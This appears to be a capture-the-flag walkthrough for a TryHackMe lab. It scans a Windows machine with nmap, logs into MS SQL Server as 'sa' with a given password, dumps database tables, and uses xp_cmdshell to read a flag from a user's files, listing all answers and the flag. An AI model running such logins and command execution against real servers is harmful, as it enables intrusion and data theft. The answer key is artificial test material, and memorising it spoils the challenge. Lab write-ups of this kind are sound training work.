- You decided that the first step would be to check the running services on
MACHINE_IP
. You resort to yesterday’s tool, Nmap.
Knowing that MACHINE_IP
is a MS Windows system, you expect it to not respond to ping probes by default; therefore, you need to add -Pn
to your nmap
command to perform the scan. This instructs Nmap to skip pinging the target to see if the host is reachable. Without this option, Nmap will assume the target host is offline and not proceed with scanning.
There is an open port related to MS SQL Server accessible over the network. What is the port number?
ANS: 1433
EXPLANATION:
Step 1: Type this command on terminal:
nmap -Pn 10.10.218.241
2. Knowing the MS SQL Server is running and accessible over the network, we want to check if our username and password are still valid. Using the AttackBox terminal, we will use the command sqsh
(pronounced skwish), an interactive database shell.
A simple syntax would be sqsh -S server -U username -P password
, where:
-S server
is used to specify the server, for example-S MACHINE_IP
-U username
is used to provide the username; for example,-U sa
is the username that we have enabled.-P password
lets us specify the password.
Let’s try to run, sqsh -S MACHINE_IP -U sa -P t7uLKzddQzVjVFJp
If the connection is successful, you will get a prompt. What is the prompt that you have received?
ANS: 1>
EXPLANATION:
Step 1: Type this command on terminal:
sqsh -S 10.10.218.241 -U sa -P t7uLKzddQzVjVFJp
3. McDatabaseAdmin told us the database name is reindeer
and it has three tables:
names
presents
schedule
To display the table names
, you could use the following syntax, SELECT * FROM table_name WHERE condition
.
SELECT *
is used to return specific columns (attributes).*
refers to all the columns.FROM table_name
to specify the table you want to read from.WHERE condition
to specify the rows (entities).
In the terminal below, we executed the query, SELECT * FROM reindeer.dbo.names;
. This SQL query should dump all the contents of the table names
from the database reindeer
. Note that the ;
indicates the end of the SQL query, while go
sends a SQL batch to the database.
Pentester Terminal
pentester@TryHackMe$ sqsh -S MACHINE_IP -U sa -P "t7uLKzddQzVjVFJp"
1> SELECT * FROM reindeer.dbo.names;
2> go
id first last nickname
----------- ---------------------------------------- ---------------------------------------- ----------------------------------------
1 Dasher Dasher Dasher
2 Dancer Dancer Dancer
3 Prancer Prancer Prancer
4 Vixen Vixen Vixen
5 Comet Comet Comet
6 Cupid Cupid Cupid
7 Donner Donder Dunder
8 Blitzen Blixem Blitzen
9 Rudolph Reindeer Red Nosed (9 rows affected)
3.1 We can see four columns in the table displayed above: id, first (name), last (name), and nickname. What is the first name of the reindeer of id 9?
ANS: Rudolph
EXPLANATION:
Step 1: SELECT * FROM reindeer.dbo.names;
Step 2: go
3.2 Check the table schedule
. What is the destination of the trip scheduled on December 7?
ANS: Prague
EXPLANATION:
Step 1: SELECT * FROM reindeer.dbo.schedule;
Step 2: go
3.3 Check the table presents
. What is the quantity available for the present “Power Bank”?
ANS: 25000
EXPLANATION:
Step 1: SELECT * FROM reindeer.dbo.presents;
Step 2: go
4. here is a flag hidden in the grinch
user's home directory. What are its contents?
ANS: THM{YjtKeUy2qT3v5dDH}
EXPLANATION:
Step 1: xp_cmdshell ‘dir type c:\Users’;
Step 2: go
Step 3: xp_cmdshell ‘dir type c:\Users\grinch’;
Step 4: go
Step 5: xp_cmdshell ‘dir type c:\Users\grinch\Documents’;
Step 6: go
Step 7: xp_cmdshell ‘type c:\Users\grinch\Documents\flag.txt’
Step 8: go
*****************THANK YOU****KEEP LEARNING ******************
HOPE YOU GUYS, THIS WALKTHROUGH MIGHT HELP YOU,IF SO LIKE THE PAGE WILL BE MUCH APPRECIATED AND FOLLOW MY PROFILE FOR MORE WRITE-UPS
*******PEACE*****